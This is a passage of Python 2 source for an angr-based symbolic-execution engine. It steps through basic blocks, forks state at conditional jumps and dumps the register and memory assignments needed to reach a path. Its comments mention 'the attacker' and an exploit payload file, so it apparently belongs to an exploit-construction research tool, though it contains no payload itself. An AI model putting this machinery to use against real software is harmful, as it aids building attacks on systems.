not set')\n\n                del self.__ext[var]\n                continue\n            \n                            \n            value = self.__state.se.eval(self.__sym[addr])\n\n             \n            dbg_prnt(DBG_LVL_3, 'External value found: 0x%x' % value)\n\n            self.__ext[ var ] = (addr, value)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # step(): This function moves the execution forward by 1 basic block.\n    #\n    # :Arg stmt: The last statement (its type determines the simulation mode)\n    # :Ret: A list with the addresses of the active states on success; -1 on failure.\n    #\n    def step( self, stmt ):\n        dbg_prnt(DBG_LVL_2, \"Moving one step forward from 0x%x ...\" % self.__state.addr)\n\n\n        # create the simulation manager object\n        simgr = self.__proj.factory.simulation_manager(thing=self.__state)\n    \n\n        self.__blk_start = self.__state.addr\n        self.__blk_end   = self.__state.addr + ADDR2NODE[self.__state.addr].size\n\n        # print 'BLK START STEP', hex(self.__blk_start)\n        # print 'BLK ENDDD STEP', hex(self.__blk_end)\n\n\n        self.__disable_hooks = False                # enable hooks to capture reads/writes\n\n        # this should throw no exception (it was already successful in absblk.py)\n        if stmt['type'] == 'call':\n            self.__sim_mode = SIM_MODE_DISPATCH\n        else:\n            # step is in functional mode ;)\n            self.__sim_mode = SIM_MODE_FUNCTIONAL\n        try: \n\n\n            try:\n                node = ADDR2NODE[self.__state.addr]\n\n            except Exception, e:\n                node = None\n\n            num_inst = len(node.instruction_addrs) if node is not None else None\n            if num_inst:\n                simgr.step(num_inst=num_inst)\n            else:\n                simgr.step()\n                \n\n        # un-satisfiable constraints (must be caught before the generic Exception handler)\n        except angr.errors.SimUnsatError:\n            dbg_prnt(DBG_LVL_2, \"Step constraints were un-satisfiable. Discard current path.\")\n            return -1\n\n        except Exception, msg:\n            dbg_prnt(DBG_LVL_3, \"Step failed. Exception raised: '%s'\" % bolds(str(msg)))\n            return -1\n\n\n        dbg_prnt(DBG_LVL_2, \"Step simulated successfully.\")\n\n        if not simgr.active:\n            print 'Stashes', simgr.stashes\n            \n            dbg_prnt(DBG_LVL_3, \"Step failed (No 'active' stashes)\")\n\n            # We may end up in a deadended state if the last block is a retn\n            # TODO: Fix that\n            return [0xdeadbeef]\n            # return -1\n\n\n        self.__disable_hooks = True                 # disable hooks again\n        \n\n        # pick the state (if > 1) with satisfiable constraints\n        for state in simgr.active:\n            dbg_prnt(DBG_LVL_3, \"Checking constraints from state: 0x%x\" % state.addr)            \n\n            state_copy = state.copy()\n            unchecked = self.unchecked_regsets[:]\n\n            if self.__check_regsets(state_copy):\n    \n                self.__state = state_copy\n\n                dbg_prnt(DBG_LVL_2, \"Done.\")\n                dbg_arb(DBG_LVL_3, \"Constraints: \", self.__state.se.constraints)\n\n\n                return [state.addr for state in simgr.active]\n\n            del state_copy\n            self.unchecked_regsets = unchecked[:]\n\n        return -1\n       \n    # ---------------------------------------------------------------------------------------------\n    # __deepcopy__():\n    #\n    # :Ret: An identical hardcopy of the current object.\n    #\n    '''\n    def __deepcopy__(self, memo):\n\n        print '__deepcopy__(%s)' % str(memo)\n        return simulate(copy.deepcopy(self, memo))\n\n        fatal('return ORM(copy.deepcopy(dict(self)))')\n    '''\n\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    
# clone(): This function clones the current simulation object once it reaches a conditional\n    #       basic block. TODO: elaborate\n    #\n    # :Arg condreg: The register that is used in the condition (must be symbolic)\n    # :Ret: An identical hardcopy of the current object.\n    #\n    def clone( self, condreg ):\n        \n        dbg_prnt(DBG_LVL_1, \"Cloning current state at 0x%x ...\" % self.__state.addr)\n\n        print 'RBX', self.__state.regs.rbx, self.__inireg['rbx'], self.__getreg('rbx')\n        \n\n        # TODO: That's a bad way to do it. Never mind, it works.\n        if   condreg == 'rax': self.__state.regs.rax = self.__state.se.BVS(\"cond_rax\", 64)                                \n        elif condreg == 'rbx': self.__state.regs.rbx = self.__state.se.BVS(\"cond_rbx\", 64)\n        elif condreg == 'rcx': self.__state.regs.rcx = self.__state.se.BVS(\"cond_rcx\", 64)\n        elif condreg == 'rdx': self.__state.regs.rdx = self.__state.se.BVS(\"cond_rdx\", 64)\n        elif condreg == 'rsi': self.__state.regs.rsi = self.__state.se.BVS(\"cond_rsi\", 64)\n        elif condreg == 'rdi': self.__state.regs.rdi = self.__state.se.BVS(\"cond_rdi\", 64)\n        elif condreg == 'rbp': self.__state.regs.rbp = self.__state.se.BVS(\"cond_rbp\", 64)\n        elif condreg == 'r8':  self.__state.regs.r8  = self.__state.se.BVS(\"cond_r08\", 64)\n        elif condreg == 'r9':  self.__state.regs.r9  = self.__state.se.BVS(\"cond_r09\", 64)\n        elif condreg == 'r10': self.__state.regs.r10 = self.__state.se.BVS(\"cond_r10\", 64)\n        elif condreg == 'r11': self.__state.regs.r11 = self.__state.se.BVS(\"cond_r11\", 64)\n        elif condreg == 'r12': self.__state.regs.r12 = self.__state.se.BVS(\"cond_r12\", 64)\n        elif condreg == 'r13': self.__state.regs.r13 = self.__state.se.BVS(\"cond_r13\", 64)\n        elif condreg == 'r14': self.__state.regs.r14 = self.__state.se.BVS(\"cond_r14\", 64)\n        elif condreg == 'r15': self.__state.regs.r15 = 
self.__state.se.BVS(\"cond_r15\", 64)\n\n        self.condreg = condreg\n        # self.__inireg[ condreg ] = self.__state.regs.rbx\n\n\n        state_copy = self.__state.copy()                        \n\n        # create the simulation manager object\n        simgr = self.__proj.factory.simulation_manager(thing=state_copy)\n  \n        print 'Stashes', simgr.stashes\n        print 'Constraints', self.__state.se.constraints\n\n        \n        # this should throw no exception (it was already successful in absblk.py)\n        simgr.step()\n\n        print 'Stashes', simgr.stashes\n\n\n        # we should have exactly 2 active states\n        print simgr.active[0].se.constraints\n        print simgr.active[1].se.constraints\n\n        if len(simgr.active) != 2:              \n            print simgr.active\n            raise Exception('Conditional jump state should have 2 active stashes')\n       \n\n        dbg_prnt(DBG_LVL_2, \"Done.\")\n        \n        self.entry = self.__state.addr\n        newsim = simulate(self.project, self.cfg, self.clobbering, self.adj, self.IR,\n                                        self.regmap, self.varmap, self.rsvp, self.entry)\n       \n        newsim.imm           = copy.deepcopy(self.__imm)\n        newsim.sym           = copy.deepcopy(self.__sym)\n        newsim.inireg        = copy.deepcopy(self.__inireg)\n        newsim.reg           = copy.deepcopy(self.__reg)\n        newsim.mem           = copy.deepcopy(self.__mem)\n        newsim.ext           = copy.deepcopy(self.__ext)\n        newsim.relative      = copy.deepcopy(self.__relative)\n        newsim.imm_regs      = copy.deepcopy(self.__imm_regs)\n        newsim.FOO           = copy.deepcopy(self.FOO)\n        newsim.alloc_size    = copy.deepcopy(self.__alloc_size)\n        newsim.state         = self.__state.copy() #copy.deepcopy(self.__state)\n        newsim.disable_hooks = copy.deepcopy(self.__disable_hooks)\n        newsim.unchecked_regsets = copy.deepcopy(self.unchecked_regsets)\n\n        newsim.copy_locally()\n\n        print 'Constraints', self.__state.se.constraints\n\n    \n        self.__state.add_constraints( simgr.active[1].se.constraints[-1] )\n        newsim.state.add_constraints( simgr.active[0].se.constraints[-1] )\n\n        del state_copy\n        \n        return newsim\n        # return copy.deepcopy(self)\n    \n    \n\n    # ---------------------------------------------------------------------------------------------\n    # copy_locally(): Copy the global (public) attributes into the object's private ones.\n    #\n    # :Ret: None.\n    #\n    def copy_locally( self ):       \n        self.__imm           = self.imm\n        self.__sym           = self.sym\n        self.__inireg        = self.inireg\n        self.__reg           = self.reg\n        self.__mem           = self.mem\n        self.__ext           = self.ext\n        self.__relative      = self.relative\n        self.__imm_regs      = self.imm_regs\n        # self.FOO             = self.FOO\n        self.__alloc_size    = self.alloc_size\n        self.__state         = self.state\n        self.__disable_hooks = self.disable_hooks\n\n        \n        # the copied state's breakpoints still reference the parent object's hooks, so re-register them\n        self.__state.inspect.b('mem_write', when=angr.BP_BEFORE, action=self.__dbg_write_hook )\n        self.__state.inspect.b('mem_read',  when=angr.BP_BEFORE, action=self.__dbg_read_hook  )  \n        self.__state.inspect.b('reg_write', when=angr.BP_BEFORE, action=self.__dbg_reg_wr_hook)\n        self.__state.inspect.b('symbolic_variable', \n                                            when=angr.BP_AFTER,  action=self.__dbg_symv_hook  )\n        self.__state.inspect.b('call',      when=angr.BP_AFTER, action=self.__dbg_call_hook   )\n  \n\n\n    # ---------------------------------------------------------------------------------------------\n    # update_globals(): Publish the private attributes back to the global (public) ones.\n    #\n    # :Ret: None.\n    #\n    def update_globals( self ):       \n        self.imm           = self.__imm\n        self.sym           = self.__sym\n        self.inireg        = self.__inireg\n        self.reg           = self.__reg\n        self.mem           = self.__mem\n        self.ext           = self.__ext\n        self.relative      = self.__relative\n        self.imm_regs      = self.__imm_regs\n        # self.FOO           = self.FOO\n        self.alloc_size    = self.__alloc_size\n        self.state         = self.__state\n        self.disable_hooks = self.__disable_hooks\n          \n        \n\n    # ---------------------------------------------------------------------------------------------\n    # stash_context(): Save current context to a stash.\n    #\n    # :Ret: None.\n    #\n    def stash_context( self ):       \n        self.__stash_imm           = copy.deepcopy(self.__imm)\n        self.__stash_sym           = copy.deepcopy(self.__sym)\n        self.__stash_inireg        = copy.deepcopy(self.__inireg)\n        self.__stash_reg           = copy.deepcopy(self.__reg)\n        self.__stash_mem           = 
copy.deepcopy(self.__mem)\n        self.__stash_ext           = copy.deepcopy(self.__ext)\n        self.__stash_relative      = copy.deepcopy(self.__relative)\n        self.__stash_imm_regs      = copy.deepcopy(self.__imm_regs)\n        self.__stash_FOO           = copy.deepcopy(self.FOO)\n        self.__stash_alloc_size    = copy.deepcopy(self.__alloc_size)\n        self.__stash_state         = self.__state.copy() #copy.deepcopy(self.__state)\n        self.__stash_disable_hooks = copy.deepcopy(self.__disable_hooks)\n        self.__stash_unchecked_regsets = copy.deepcopy(self.unchecked_regsets)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # drop_context_stash(): Drop context stash.\n    #\n    # :Ret: None.\n    #\n    def drop_context_stash( self ):       \n        del self.__stash_imm\n        del self.__stash_sym \n        del self.__stash_inireg\n        del self.__stash_reg\n        del self.__stash_mem\n        del self.__stash_ext \n        del self.__stash_relative\n        del self.__stash_imm_regs\n        del self.__stash_FOO\n        del self.__stash_alloc_size\n        del self.__stash_state \n        del self.__stash_disable_hooks\n        del self.__stash_unchecked_regsets \n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # unstash_context(): Remove a context from stash and use it.\n    #\n    # :Ret: None.\n    #\n    def unstash_context( self ):       \n        del self.__imm\n        del self.__sym\n        del self.__inireg\n        del self.__reg\n        del self.__mem\n        del self.__ext\n        del self.__relative\n        del self.__imm_regs\n        del self.FOO\n        del self.__alloc_size\n        del self.__state\n        del self.__disable_hooks\n        del self.unchecked_regsets\n\n        self.__imm           = self.__stash_imm\n        self.__sym           = self.__stash_sym \n        self.__inireg 
       = self.__stash_inireg\n        self.__reg           = self.__stash_reg\n        self.__mem           = self.__stash_mem\n        self.__ext           = self.__stash_ext \n        self.__relative      = self.__stash_relative\n        self.__imm_regs      = self.__stash_imm_regs\n        self.FOO             = self.__stash_FOO\n        self.__alloc_size    = self.__stash_alloc_size\n        self.__state         = self.__stash_state \n        self.__disable_hooks = self.__stash_disable_hooks\n        self.unchecked_regsets = self.__stash_unchecked_regsets\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # constraints(): Get the constraints of the current state.\n    #\n    # :Ret: The list of constraints.\n    #\n    def constraints( self ):\n        return self.__state.se.constraints\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __make_relative(): Make an address relative (if needed).\n    #\n    # :Arg addr: Current address\n    # :Ret: A string with the relative address.\n    #\n    def __make_relative( self, addr ):\n        '''\n        # TODO: breaks for eval/orzhttpd/orzhttpd -s payloads/memrd.spl        \n        elif abs(addr - FRAMEPTR_BASE_ADDR) < MAX_BOUND or abs(addr - RSP_BASE_ADDR) < MAX_BOUND:\n\n            if abs(addr - RSP_BASE_ADDR) < abs(addr - FRAMEPTR_BASE_ADDR):\n\n                if addr > RSP_BASE_ADDR:\n                    return \"($stack + 0x%03x)\" % (addr - RSP_BASE_ADDR)\n                else:\n                    return \"($stack - 0x%03x)\" % (RSP_BASE_ADDR - addr)\n\n            else:\n                if addr > FRAMEPTR_BASE_ADDR:\n                    return \"($frame + 0x%03x)\" % (addr - FRAMEPTR_BASE_ADDR)\n                else:\n                    return \"($frame - 0x%03x)\" % (FRAMEPTR_BASE_ADDR - addr)\n        '''\n\n\n        if addr in self.__relative:                 # if in relative table\n            return '(' + 
self.__relative[addr] + ')'\n\n        # stack first, then frame\n        elif abs(addr - RSP_BASE_ADDR) < MAX_BOUND:\n            if addr > RSP_BASE_ADDR:\n                return \"($stack + 0x%03x)\" % (addr - RSP_BASE_ADDR)\n            else:\n                return \"($stack - 0x%03x)\" % (RSP_BASE_ADDR - addr)\n\n        elif abs(addr - FRAMEPTR_BASE_ADDR) < MAX_BOUND:\n            if addr > FRAMEPTR_BASE_ADDR:\n                return \"($frame + 0x%03x)\" % (addr - FRAMEPTR_BASE_ADDR)\n            else:\n                return \"($frame - 0x%03x)\" % (FRAMEPTR_BASE_ADDR - addr)\n    \n   \n        elif abs(addr - POOLVAR_BASE_ADDR) < MAX_BOUND:\n            if addr > POOLVAR_BASE_ADDR:\n                return \"($pool + 0x%03x)\" % (addr - POOLVAR_BASE_ADDR)\n            else:\n                return \"($pool - 0x%03x)\" % (POOLVAR_BASE_ADDR - addr)\n            \n        elif POOLVAR_BASE_ADDR <= addr <= POOLVAR_BASE_ADDR + self.__plsz:\n            return \"($pool + 0x%03x)\" % (addr - POOLVAR_BASE_ADDR)\n\n\n        elif ALLOCATOR_BASE_ADDR <= addr and addr <= ALLOCATOR_CEIL_ADDR:\n            return \"($alloca + 0x%03x)\" % (addr - ALLOCATOR_BASE_ADDR)                    \n            \n        else:\n            return \"0x%x\" % addr\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __is_relative(): Check if an address is relative.\n    #\n    # :Arg addr: Current address\n    # :Ret: True if it's relative. 
False otherwise.\n    #\n    def __is_relative( self, addr ):\n\n        if addr in self.__relative:                 # if in relative table\n            return True\n\n        elif abs(addr - RSP_BASE_ADDR) < MAX_BOUND:\n            return True\n        \n        elif abs(addr - FRAMEPTR_BASE_ADDR) < MAX_BOUND:\n            return True\n\n        elif abs(addr - POOLVAR_BASE_ADDR) < MAX_BOUND:\n            return True \n\n        elif POOLVAR_BASE_ADDR <= addr <= POOLVAR_BASE_ADDR + self.__plsz:\n            return True\n\n        elif ALLOCATOR_BASE_ADDR <= addr and addr <= ALLOCATOR_CEIL_ADDR:\n            return True\n            \n        else:\n            return False\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # dump(): Dump the results of the simulation.\n    #\n    # :Arg output: The output object\n    # :Ret: None.\n    #\n    def dump( self, output ):\n        # for a, b in self.__relative.iteritems():\n        #     print 'relative', hex(a), b\n\n        output.newline()\n        \n        if self.__plsz > 0:\n            output.comment('Allocation size is always bigger (it may not be needed at all)')\n            output.alloc(POOLVAR_NAME, self.__plsz)\n            output.newline()\n\n\n\n        if self.__alloc_size > 0:\n            output.comment('Allocation size is always bigger')\n            output.alloc(ALLOCATOR_NAME, self.__alloc_size)\n            output.newline()\n\n\n        # TODO: make sure that there is a single $rbp, $stack, $frame (not 1 per fork)\n        output.comment('OPTIONAL!')        \n        output.set('$rbp', '$rsp + 0xc00')              # TODO: KEEP ME CONSISTENT!\n\n        output.comment('Stack and frame pointer aliases')\n        output.set('$stack', '$rsp')\n        output.set('$frame', '$rbp')\n        output.newline()\n\n\n        # ---------------------------------------------------------------------\n        # TODO: Having a primitive to set registers 
may be useless.\n    #       Give the attacker the option to discard solutions\n    #       that use apriori registers\n    #\n        dbg_prnt(DBG_LVL_0, 'Apriori Register Assignments (if any):')\n\n        for reg, val in self.__reg.iteritems():\n            # tuples are not part of the constraints and therefore are discarded\n            if not isinstance(val, tuple):\n\n                dbg_prnt(DBG_LVL_0, '\\t%s = 0x%x (DROP)' % (reg, val))\n                                \n                #output.register(reg, val, comment='(DROP)')\n                output.comment('(DROP) %s = %s' % (reg, val))\n                #output.register(reg, val)\n                #output.newline()\n\n        output.newline()\n\n        for reg, symv in self.__inireg.iteritems():\n            # check if any of the original registers are still in the constraints\n            if symv != None:\n                symv = self.__make_relative(symv)\n\n                # print 'OUTPUT:', symv\n                output.register(reg, symv)\n\n        \n        output.newline()\n\n        if self.condreg and isinstance(self.condreg, tuple):            \n            reg, symv = self.condreg\n            symv = self.__make_relative(symv)\n \n            output.comment('(CONDITIONAL) %s = %s' % (reg, symv))\n             \n\n        # ---------------------------------------------------------------------\n        dbg_prnt(DBG_LVL_0, 'Memory Addresses for variables (if any):')\n\n        output.newline()\n\n        # variables\n        for addr, values in self.__inivar_rel.iteritems():\n\n            displacement = 0\n\n            # check which elements from values are relative addresses\n            for val in values:                \n                if isinstance(val, str):            # string values are directly packed                    \n                    pval = '{' + ', '.join(\"0x{0:02x}\".format(ord(c)) for c in val) + '}'\n                    size = len(val)\n\n                else:\n                    if not self.__is_relative(val):\n                        pval = '{' + ', '.join(\"0x{0:02x}\".format(ord(c)) for c in struct.pack(\"<Q\", val)) + '}'\n                    else:\n                        pval = self.__make_relative(val)\n\n                    size = 8\n\n\n\n                # calculate address (base + offset + displacement)\n                paddr = \"(%s + 0x%02x)\" % (self.__make_relative(addr), displacement)\n\n\n                displacement += size                # shift inside variable's values\n                output.memory(paddr, pval, size)\n            \n\n                dbg_prnt(DBG_LVL_0, \"\\t*%s = %s\" % (paddr, pval))\n\n\n        # ---------------------------------------------------------------------\n        dbg_prnt(DBG_LVL_0, 'Other Memory Addresses:')\n\n        output.newline()\n\n\n        for addr, val in self.__mem.iteritems():\n            if isinstance(val, tuple):\n\n                # if val[0] in self.__relative:\n                if \"0x%x\" % val[0] != self.__make_relative(val[0]):\n                    # pval = '(' + self.__relative[ val[0] ] + ')'\n                    pval = self.__make_relative(val[0])\n\n                else:\n                    # cast integer to zero-padded hex string\n                    x = (\"{0:0%dx}\" % (val[1] << 1)).format(val[0])\n\n                    # cast string to bytes and change endianness\n                    x = ''.join(reversed(x.decode('hex')))\n\n                    # print string in C-style format\n                    pval = '{' + ', '.join(\"0x{0:02x}\".format(ord(c)) for c in x) + '}'\n                    #lval = [\"0x{0:02x}\".format(ord(c)) for c in x]\n\n\n                paddr = self.__make_relative(addr)                \n                #   output.memory(addr, '', addr, lval, op='+')\n\n                for a, b in self.__ext.iteritems():\n                    #print '^^^^^^^^^^', a, b, addr\n                    if b != EXTERNAL_UNINITIALIZED and addr == b[0]:\n                        output.comment('value comes from external input (DROP)')\n                        break\n\n\n                output.memory(paddr, pval, val[1])\n\n                dbg_prnt(DBG_LVL_0, \"\\t*%s = %s\\t# %d bytes\" % (paddr, pval, val[1]))\n\n\n        # ---------------------------------------------------------------------\n        dbg_prnt(DBG_LVL_0, 'External Input (if any): ')\n        \n        # TODO: better variable names\n        ext_stdin = { }\n        ext_file  = { }\n        ext_retn  = { }\n        stdin, file, retn = [], [], []\n\n\n        for var, value in self.__ext.iteritems():\n            if value == EXTERNAL_UNINITIALIZED:\n                continue\n            \n\n            if 'stdin' in var.args[0]:\n                ext_stdin[ var.args[0] ] = value\n\n            elif SYMBOLIC_FILENAME in var.args[0]:\n                ext_file[ var.args[0] ] = value\n\n            elif 'unconstrained_ret' in var.args[0]:\n                ext_retn[ var.args[0].replace(\"unconstrained_ret___\", \"\") ] = value\n\n        \n        for var in sorted(ext_stdin):\n            stdin.append('0x%x' % ext_stdin[var][1])\n\n        for var in sorted(ext_file):\n            file.append('0x%x' % ext_file[var][1])\n\n        for var in sorted(ext_retn):\n            retn.append('%s = 0x%x' % (str(var), ext_retn[var][1]))\n        \n        dbg_arb(DBG_LVL_0, 'External input (stdin) :', stdin)\n        dbg_arb(DBG_LVL_0, 'External input (file)  :', file)\n        dbg_arb(DBG_LVL_0, 'External input (return):', retn)\n\n\n        output.newline()\n        output.comment('External input (stdin): %s'  % str(stdin))\n        output.comment('External input (%s): %s'     % (SYMBOLIC_FILENAME, str(file)))\n        output.comment('External input (return): %s' % str(retn))\n        \n\n        # for a,b in self.__relative.iteritems():\n        #     print 'ADDR2SYM', hex(a), b\n\n\n        dbg_prnt(DBG_LVL_0, 
\"pool_base  = 0x%x\" % POOLVAR_BASE_ADDR)\n        dbg_prnt(DBG_LVL_0, \"stack_base = 0x%x\" % RSP_BASE_ADDR)\n        \n\n\n# -------------------------------------------------------------------------------------------------\n"
  }
]